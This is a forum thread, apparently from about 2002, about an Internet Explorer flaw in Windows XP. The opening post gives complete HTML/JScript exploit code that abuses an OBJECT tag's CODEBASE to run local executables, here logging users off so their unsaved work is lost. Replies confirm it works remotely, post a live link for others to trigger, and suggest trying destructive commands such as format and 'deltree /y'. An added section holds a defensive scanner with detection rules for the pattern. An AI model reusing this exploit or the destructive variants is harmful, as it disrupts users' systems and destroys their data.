Serious Problem With Windows XP Keep this going

cremator

Senior member
Sep 21, 2001
643
0
0
I'm just going to paste the source and explain what it does, nothing less.



<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>



Basically this is an HTML file that, when opened in Windows XP, will log you off. Some might say "so", but when you open it, it doesn't ask to save work in progress etc. The other concern is that others may be able to use command lines like command.com etc. to do something worse. I've only tested with logoff.exe and sol.exe; anyone else feel free to test with other programs. Lamers, please don't put this on a site just to be an idiot, no one wants to lose work that's been in progress for hours/days/weeks/months.
-Cremator
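
A defender-side check for the pattern in the post above, as an added example that is not part of the original thread: it flags OBJECT tags whose CODEBASE names a local executable, including the case shown in the post where the tag is assembled by string concatenation inside a script, so the path never appears in the attribute itself. It also covers the plain literal-tag case, which goes beyond the posted sample. The rule names, the extension list and the sample strings (placeholder path and CLSID) are assumptions made for this sketch.

```javascript
// Added example: static triage for the OBJECT/CODEBASE pattern in the post above.
// Rule names, extension list and sample strings are assumptions of this sketch.
const LOCAL_EXE = /^(?:file:\/\/\/?)?(?:[a-z]:[\\/]|\\\\)[^'"<>]*\.(?:exe|com|bat|cmd|scr|pif)$/i;
const CODEBASE = /\bcodebase\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

function scanHtml(html) {
  const findings = [];
  // 1. OBJECT tags, whether literal markup or markup held in a script string.
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const m = CODEBASE.exec(tag);
    if (!m) continue;
    const value = (m[1] ?? m[2] ?? m[3]).trim();
    if (LOCAL_EXE.test(value)) {
      findings.push({ rule: 'object-codebase-local-exe', value });
    } else if (/^["']\s*\+|\+\s*["']$/.test(value)) {
      // Value is spliced in by concatenation; the real target lives elsewhere.
      findings.push({ rule: 'object-codebase-dynamic', value });
    }
  }
  // 2. String literals inside <script> that name a local executable.
  //    Simple tokenizer: does not understand comments or regex literals.
  for (const [, body] of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const s of body.matchAll(/'([^'\\\n]*)'|"([^"\\\n]*)"/g)) {
      const value = s[1] ?? s[2];
      if (LOCAL_EXE.test(value)) findings.push({ rule: 'script-local-exe-literal', value });
    }
  }
  return findings;
}

function verdict(findings) {
  const rules = new Set(findings.map(f => f.rule));
  if (rules.has('object-codebase-local-exe')) return 'block';
  if (rules.has('object-codebase-dynamic') && rules.has('script-local-exe-literal')) return 'block';
  return rules.size ? 'review' : 'clean';
}

// Constructed samples (placeholder path and CLSID, not taken from a real page).
const NULL_CLSID = 'CLSID:00000000-0000-0000-0000-000000000000';
const DYNAMIC = `<script>var p=new Array('c:/example/placeholder.exe');
var h="<OBJECT CLASSID='${NULL_CLSID}' CODEBASE='"+p[0]+"'></OBJECT>";</script>`;
const LITERAL = `<OBJECT CLASSID="${NULL_CLSID}" CODEBASE="c:/example/placeholder.exe"></OBJECT>`;
const BENIGN = `<object classid="${NULL_CLSID}" codebase="http://example.com/control.cab#version=1,0,0,0"></object>`;

console.log(verdict(scanHtml(DYNAMIC)), verdict(scanHtml(LITERAL)), verdict(scanHtml(BENIGN)));
```

A `review` verdict means only one of the two signals was present, for example a concatenated CODEBASE with no local executable literal in the same page.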
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Worked for me (Cremator's friend).
I just tried it out after seeing his post.
Slapped it in a TXT file, renamed to *.htm, double-clicked it and it logged me off.
And my programs weren't still open when I logged back in :|
I'm too used to XP's "multiple users logged in at the same time" (Fast User Switching) features...
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
Nice, is this really a new remote exploit? Or is it fixed by a recent IE patch?

Looks mind-numbingly simple, although to be honest, it wouldn't surprise us that much.
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Perhaps IE only runs it if it's on your local machine. I dunno really...
 

mattbta

Senior member
Dec 15, 2001
223
0
76
brotherson.com
When I get home I'll slap it on my server and then try to access the page from my XP box. I thought an exploit like this was fixed with the last IE patch.

We'll see what happens.
 

Confused

Elite Member
Nov 13, 2000
14,166
0
0
Well, it works when it's hosted on another computer.

Don't believe me, click here! (Make sure you save all work first though if running WinXP! Don't say I didn't warn you!)

ConfusedBW
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
So the only question is whether recent IE patches fix this obvious, major problem, or if it's currently a problem in the wild?
 

Abzstrak

Platinum Member
Mar 11, 2000
2,450
0
0
glad I'm not running windows....

anyways, we need to try this with some other apps that are standard to winxp... like format, deltree /y, etc...

has anyone tried this on nt or 2k?

 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems.
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Still logs me out (I felt that I had to wait a bit longer though).
The only updates not installed on my side:
Euro Conversion Tool
GeForce3 driver Update (Gateway)

Not sure what that GF3 thing is about, I'm using a home-built P4 system with a retail VisionTek GF3. All I know is that when I installed that update I couldn't even raise my resolution to 1024x768! I hope the driver roll-back didn't affect the other updates :)
 

dionx

Diamond Member
Mar 11, 2001
3,500
1
81
I just installed 2 security updates and 2 critical updates and it still logs me off.

 

speed01

Golden Member
Jan 23, 2001
1,167
0
0
Didn't log me out. I ran Windows Update last week and only did the critical and security.
 

Dreadogg

Golden Member
Mar 1, 2001
1,780
0
76
Logged me out and I'm all updated! OK, you guys that did not get logged out, are you using XP Pro or XP Home?
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
I did a little more testing, and I'll take back my comments from a few days ago that system updates cured IE.

It seems like the Administrator user is vulnerable, but limited users are not. I test WXP Pro under VMware, so I can repeat different iterations pretty easily. Note that I believe most installations of WXP will add created user accounts to the Administrator group, so this is a serious problem.

Security settings for the Internet and Intranet domains have no effect; setting them both to High still exposed the problem. I was too lazy to test from a web server though, and just loaded the file locally.

Finally, it seems you can run any executable, but I wasn't able to get it to run arbitrary shell commands using cmd /C.

I'm sure more seasoned crackers than myself could do much heavier damage though. If I weren't such a cynic, I'd say this is a new, dangerous remote exploit. But I'm sure Mickeysoft is aware of the problem, and will sit on it until a white hat hacker goes to the media. Any volunteers?
 

Dreadogg

Golden Member
Mar 1, 2001
1,780
0
76
Very interesting, seems we really shouldn't be surfing the net as administrator anyway! I seem to play around with Linux every once in a while, and I always remember reading "make sure you don't surf the net as root". I guess this all ties in together. For now I'm just going to set up a new account as user!



EDIT: I am not affected as user! Good call!
 

TBC

Member
Nov 27, 2001
144
0
0


<< I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems.
>>


Let me guess, you use Linsux.
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136


<<
Let me guess, you use Linsux.
>>



Oh the irony of trolling in a thread about a major remote exploit in WXP.
 

neuralfx

Golden Member
Feb 19, 2001
1,636
0
0


<< I'm too used to XPs "multiple users logged in at the same time" (Fast User Switching) features >>



Heh, sorry, I'm not trolling... but couldn't resist... this "Fast User Switching"... or I guess Microsoft probably calls it FUS, could this possibly have been "borrowed" from UNIX... eh, nah, MS wouldn't do that =)
-neural